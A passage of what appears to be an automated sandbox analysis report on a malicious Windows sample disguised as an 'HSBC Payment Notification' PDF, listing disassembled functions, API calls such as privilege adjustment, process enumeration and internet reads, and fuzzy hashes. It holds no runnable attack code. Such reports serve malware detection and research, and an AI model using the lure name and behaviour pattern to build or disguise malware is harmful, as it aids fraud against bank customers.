                                                                                                                                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 99427753-0
                                                                                                                                                    • Opcode ID: 77a8c2a142281090e394b0e0d14c417a392868478e52ac264b4faa38142e6d55
                                                                                                                                                    • Instruction ID: 4f4fa4b069b112be458f20050bee2991dabce79e459f6d74e9331a247e2dcb9e
                                                                                                                                                    • Opcode Fuzzy Hash: 77a8c2a142281090e394b0e0d14c417a392868478e52ac264b4faa38142e6d55
                                                                                                                                                    • Instruction Fuzzy Hash: E941D275A00600AFDB10BF258C86F6E77A89F45718F05C56EFA59BB3C3CA789D008799
                                                                                                                                                    Function 00485376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 292994002-0
                                                                                                                                                    • Opcode ID: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                                                                                                                                                    • Instruction ID: 2bf7cd1b22f0a435aba1bf6783624a0e9851140f374647b9b1574053626a0f4e
                                                                                                                                                    • Opcode Fuzzy Hash: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                                                                                                                                                    • Instruction Fuzzy Hash: BB11B232700911ABEB217F269C44A6F7B99EF447A1B40483EFC45E3242DB789C0287AD
                                                                                                                                                    Function 004580A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                                                                                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 44706859-0
                                                                                                                                                    • Opcode ID: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                                                                                                                                                    • Instruction ID: 8dae455e1ba13099d0d58f164bb34b259a0b96a713bdc7d240504e0717c8d456
                                                                                                                                                    • Opcode Fuzzy Hash: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                                                                                                                                                    • Instruction Fuzzy Hash: EBF08C30200614AFEB104FA4EC8CE6B3BACEF4A755B10043EF90592251DF649C09DB64
                                                                                                                                                    Function 0046C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0046C432
                                                                                                                                                    • CoCreateInstance.OLE32(00492D6C,00000000,00000001,00492BDC,?), ref: 0046C44A
                                                                                                                                                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                    • CoUninitialize.OLE32 ref: 0046C6B7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                                                    • String ID: .lnk
                                                                                                                                                    • API String ID: 2683427295-24824748
                                                                                                                                                    • Opcode ID: 2168bc15797479d4bf9d8be8a874f14214ce5ae81521c48187290a1a744f77cd
                                                                                                                                                    • Instruction ID: adb56a4b7a52abdaef05598002f92e73435f728c8d9d90c66f29e414dbdf6fe1
                                                                                                                                                    • Opcode Fuzzy Hash: 2168bc15797479d4bf9d8be8a874f14214ce5ae81521c48187290a1a744f77cd
                                                                                                                                                    • Instruction Fuzzy Hash: 5AA14AB1104205AFD700EF55C881EAFB7E8EF85308F00492EF595972A2EB75EE09CB56
                                                                                                                                                    Function 00404B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00404AD0), ref: 00404B45
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404B57
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                    • API String ID: 2574300362-192647395
                                                                                                                                                    • Opcode ID: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
                                                                                                                                                    • Instruction ID: eac2b9657e48c1354d3ce07b29e145d4c0a45f8badf8df95cafcbf2a1bd35060
                                                                                                                                                    • Opcode Fuzzy Hash: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
                                                                                                                                                    • Instruction Fuzzy Hash: 8ED01274A10713CFD720AF31D818B0A76E4AF45751B218C3F9485D6690D678F8C4C75C
                                                                                                                                                    Function 0047EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0047EE3D
                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0047EE4B
                                                                                                                                                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 0047EF0B
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0047EF1A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2576544623-0
                                                                                                                                                    • Opcode ID: 55b2806c571e794d70189e9b258b2a54ff26ce71ab56e674bdcd20fc5077a503
                                                                                                                                                    • Instruction ID: a98c0e68db7b9d45d0fd814aff1298f869d04e0007e226020b87bcf654703779
                                                                                                                                                    • Opcode Fuzzy Hash: 55b2806c571e794d70189e9b258b2a54ff26ce71ab56e674bdcd20fc5077a503
                                                                                                                                                    • Instruction Fuzzy Hash: BB519171504300AFD310EF21CC85EABB7E8EF88714F10492EF595A72A1DB34AD08CB96
                                                                                                                                                    Function 0045E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0045E628
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrlen
                                                                                                                                                    • String ID: ($|
                                                                                                                                                    • API String ID: 1659193697-1631851259
                                                                                                                                                    • Opcode ID: eef32c7583b458a7172a6c711d1ec7a4f2f7e3610f1f932fb94fc73443e575d2
                                                                                                                                                    • Instruction ID: d66d97c7bb63d5e7dad9b567a4e3f94d41a6da7275ee88609bc8c1bec3a8e44c
                                                                                                                                                    • Opcode Fuzzy Hash: eef32c7583b458a7172a6c711d1ec7a4f2f7e3610f1f932fb94fc73443e575d2
                                                                                                                                                    • Instruction Fuzzy Hash: 21322675A007059FD728CF2AC481A6AB7F0FF48310B15C56EE89ADB3A2E774E941CB44
                                                                                                                                                    Function 004722EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0047180A,00000000), ref: 004723E1
                                                                                                                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00472418
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 599397726-0
                                                                                                                                                    • Opcode ID: f5373d92f6f0dc30811b4af31ba5f0bb4595b0a53436f4c0864762cea70d04c2
                                                                                                                                                    • Instruction ID: 97e6fa55f52fdedc64eb36c533065f345fcd4e8e1beeb73d4f24c64f527f6271
                                                                                                                                                    • Opcode Fuzzy Hash: f5373d92f6f0dc30811b4af31ba5f0bb4595b0a53436f4c0864762cea70d04c2
                                                                                                                                                    • Instruction Fuzzy Hash: 0941DA71604205BFEB20DE65DE81EFB77BCEB40314F10806FFA49A6241DABC9E419658
                                                                                                                                                    Function 0046B333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0046B343
                                                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0046B39D
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0046B3EA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1682464887-0
                                                                                                                                                    • Opcode ID: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
                                                                                                                                                    • Instruction ID: 737ef1c34fd19c378388d330bbb387c55d680846c188baab6e7c30573ba64571
                                                                                                                                                    • Opcode Fuzzy Hash: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
                                                                                                                                                    • Instruction Fuzzy Hash: 7D21AE75A10108EFCB00EFA5D880AEEBBB8FF48314F0080AAE905AB351DB359D59CB55
                                                                                                                                                    Function 004587E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                                                                                      • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00458865
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1922334811-0
                                                                                                                                                    • Opcode ID: 11fd776744e65cad2fb0d65c8c6b7c288e777bf7a622f9fe62c50e0e4f52890d
                                                                                                                                                    • Instruction ID: 5e41a7b511489fb1457012ee205441660039eb57adee2e696ecce50f3e5e177b
                                                                                                                                                    • Opcode Fuzzy Hash: 11fd776744e65cad2fb0d65c8c6b7c288e777bf7a622f9fe62c50e0e4f52890d
                                                                                                                                                    • Instruction Fuzzy Hash: 7511BFB2514204AFE718EFA4EC85D2BB7F8EB05315B60852EF85593212EF34BC448B64
                                                                                                                                                    Function 0045874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00458774
                                                                                                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0045878B
                                                                                                                                                    • FreeSid.ADVAPI32(?), ref: 0045879B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3429775523-0
                                                                                                                                                    • Opcode ID: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                                                                                                                                                    • Instruction ID: 222101879978235e3db2a0a583f2c1bf244a93baf2b2f2d6b5292d8d16c370cf
                                                                                                                                                    • Opcode Fuzzy Hash: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                                                                                                                                                    • Instruction Fuzzy Hash: 4CF04F7591130CBFDF00DFF4DC89AAEB7BCEF09201F104879A901E2181D7756A088B54
                                                                                                                                                    Function 00468889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __time64.LIBCMT ref: 0046889B
                                                                                                                                                      • Part of subcall function 0042520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00468F6E,00000000,?,?,?,?,0046911F,00000000,?), ref: 00425213
                                                                                                                                                      • Part of subcall function 0042520A: __aulldiv.LIBCMT ref: 00425233
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                                                    • String ID: 0eL
                                                                                                                                                    • API String ID: 2893107130-3167399643
                                                                                                                                                    • Opcode ID: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
                                                                                                                                                    • Instruction ID: 2c57299538d283c5d644ae0a39161a0e0d0ec28ce0c746f6c7e9e831f8b60585
                                                                                                                                                    • Opcode Fuzzy Hash: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
                                                                                                                                                    • Instruction Fuzzy Hash: B421AF326256108BC729CF29D841A52B3E1EFA5311B698F6DD0F5CB2C0DA38A905CB58
                                                                                                                                                    Function 0046C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0046C6FB
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0046C72B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                                    • Opcode ID: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
                                                                                                                                                    • Instruction ID: b4b64e4e0be63edce78860a78e1dfdfe78961efcf08952f795b51eb70efe8952
                                                                                                                                                    • Opcode Fuzzy Hash: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
                                                                                                                                                    • Instruction Fuzzy Hash: 411152726106049FDB10EF29D88592AF7E5EF85325F00C52EF9A5D7391DB34AC05CB85
                                                                                                                                                    Function 0046A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A097
